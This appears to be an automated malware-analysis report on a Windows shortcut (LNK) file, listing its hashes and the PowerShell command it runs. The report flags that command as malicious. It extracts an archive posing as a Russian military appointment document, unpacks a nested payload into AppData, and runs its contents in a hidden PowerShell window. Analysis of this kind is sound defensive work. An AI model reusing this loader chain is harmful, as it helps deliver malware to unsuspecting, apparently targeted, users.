2731b3e8524e523a84dc7374ae29ac23
LNK File | MD5: 2731b3e8524e523a84dc7374ae29ac23 | Size: 2.27 KB | application/x-ms-shortcut
|
Hash | Hash Value |
|---|---|
| MD5 | 2731b3e8524e523a84dc7374ae29ac23
|
| Sha1 | 9a2a3126c6045edfe6d366939b201181da456f4a
|
| Sha256 | f44fa352c430d5f34462143daa726660be9d1bd0666ab2f3672df47adde55986
|
| Sha384 | 623942467ddd4e636fa63ebc6b121e6e569e35c135a68ffc5efcdeac9290b41409f885115b7f3fae2f2f0461358fa8d8
|
| Sha512 | 44bf6270c0c5be5d31b612d751e3d171e52825d5d59003ca938f9f46032d2135a20d13f1e606f3ccde8990182b14d68b8933f4bca9fefeb4e580db7de1a4c046
|
| SSDeep | 48:8wEfRSnkc+6Ym1tP0KZyKZuYZzNdWeHbd0dTdDabiMH:8wEfRDzOkspdBHO5dDz
|
| TLSH | A741AC1567FA031CF2F74B396ABFA252997AFD05DA229B8D0105608C0870E20D971F7B
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe $p=$env:USERPROFILE+'\Downloads\Исх №6626 Представление на назначение на воинскую должность.pdf.zip';Expand-Archive $p -DestinationPath $env:USERPROFILE\Downloads\incrementalStreamingMergingSocket; $p=$env:USERPROFILE+'\Downloads\incrementalStreamingMergingSocket\FOUND.000\processorContainerLogging.zip';Expand-Archive -Path $p -DestinationPath $env:APPDATA\reaper; $mergingAlgorithmEncrypting = gc $env:APPDATA\reaper\responsiveHashingSocketScalableDeterministic; Start-Process -WindowStyle Hidden powershell $mergingAlgorithmEncrypting |
| Deobfuscated PowerShell | $mergingAlgorithmEncrypting |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe $p=$env:USERPROFILE+'\Downloads\Исх №6626 Представление на назначение на воинскую должность.pdf.zip';Expand-Archive $p -DestinationPath $env:USERPROFILE\Downloads\incrementalStreamingMergingSocket; $p=$env:USERPROFILE+'\Downloads\incrementalStreamingMergingSocket\FOUND.000\processorContainerLogging.zip';Expand-Archive -Path $p -DestinationPath $env:APPDATA\reaper; $mergingAlgorithmEncrypting = gc $env:APPDATA\reaper\responsiveHashingSocketScalableDeterministic; Start-Process -WindowStyle Hidden powershell $mergingAlgorithmEncrypting Malicious |
2731b3e8524e523a84dc7374ae29ac23 |
| Deobfuscated PowerShell | $mergingAlgorithmEncrypting Malicious |
2731b3e8524e523a84dc7374ae29ac23 > LNK CommandLine > [PowerShell Command] |